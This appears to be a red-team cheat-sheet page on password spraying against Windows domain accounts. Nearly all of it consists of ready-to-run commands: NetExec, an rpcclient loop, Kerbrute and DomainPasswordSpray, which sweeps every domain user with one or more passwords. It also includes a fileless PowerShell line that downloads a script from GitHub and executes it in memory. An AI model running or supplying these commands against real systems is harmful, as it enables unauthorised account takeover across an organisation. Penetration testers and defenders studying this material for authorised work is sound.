PRIMARY CATEGORY → WINDOWS CREDENTIALS BRUTEFORCING
Theory
This technique consists of carrying out a set of logon attempts against a remote target through a certain protocol, such as SMB or RPC, by providing a user list and a single password as input data
It is always mandatory, before proceed with these type of attacks, to glean information about the Domain Password Policy in order to prevent locking any domain user account
Spraying from Linux
Netexec
- Domain Level
nxc <PROTOCOL> <TARGET> --username <USER_LIST> --password '<PASSWD>'- Local Level
nxc <PROTOCOL> <TARGET> --username <USER_LIST> --password '<PASSWD>' --local-authRPCclient
while IFS= read -r _user ; do rpcclient --user "${_user}%<PASSWD>" --command 'getusername ; quit' <TARGET> ; done < ./<USER_LIST> |& awk -v IGNORECASE=1 '/authority/ { gsub(/,/,"") ; print $3 }'Kerbrute
kerbrute passwordspray --dc <TARGET> --domain <DOMAIN> <USER_LIST> '<PASSWD>'Spraying from Windows
DomainPasswordSpray
Setup
- Fileless
IEX (New-Object Net.WebClient).downloadString('https://github.com/dafthack/DomainPasswordSpray/raw/refs/heads/master/DomainPasswordSpray.ps1')- Importing Powershell Module
IWR -UseBasicParsing -Uri 'https://github.com/dafthack/DomainPasswordSpray/raw/refs/heads/master/DomainPasswordSpray.ps1' -OutFile '.\DomainPasswordSpray.ps1'Import-Module .\DomainPasswordSpray.ps1Usage
When executed on a domain-joined host, this tool automatically gathers all domain user accounts. Therefore, there is no need to specify a valid user list
- W/O Userlist + Password
Invoke-DomainPasswordSpray -Password '<PASSWD>' -OutFile <OUTPUT_FILE> -ErrorAction SilentlyContinue- Userlist provided + Password
Invoke-DomainPasswordSpray -UserList <USER_LIST> -Domain <DOMAIN> -Password '<PASSWD>' -OutFile <OUTPUT_FILE> -ErrorAction SilentlyContinue- Userlist provided + Set of Passwords
Invoke-DomainPasswordSpray -UserList <USER_LIST> -Domain <DOMAIN> -PasswordList '<PASSWD>' -OutFile <OUTPUT_FILE> -ErrorAction SilentlyContinue